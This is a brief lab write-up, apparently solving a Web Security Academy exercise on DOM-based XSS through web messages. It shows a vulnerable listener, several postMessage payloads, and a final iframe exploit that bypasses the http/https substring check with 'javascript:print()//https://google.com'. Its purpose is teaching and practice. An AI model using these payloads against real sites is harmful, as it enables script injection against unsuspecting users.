XSS DOM via Web Messages et URL JavaScript
DOM XSS using web messages and a JavaScript URL

Contournement de la validation


Exploit final

Mis à jour




Mis à jour
<script>
window.addEventListener('message', function(e) {
var url = e.data;
if (url.indexOf('http:') > -1 || url.indexOf('https:') > -1) {
location.href = url;
}
}, false);
</script>window.postMessage('https://jord4n.pro', '*');window.postMessage('javascript:alert(0)', '*'); window.postMessage('javascript:alert(0)//https://google.com', '*'); window.postMessage('javascript:print()//https://google.com', '*'); <iframe
src="https://0a3c00e80375c1ca825c9cec00b50011.web-security-academy.net/"
width="500"
height="500"
onload="this.contentWindow.postMessage('javascript:print()//https://google.com', '*'); "
</iframe>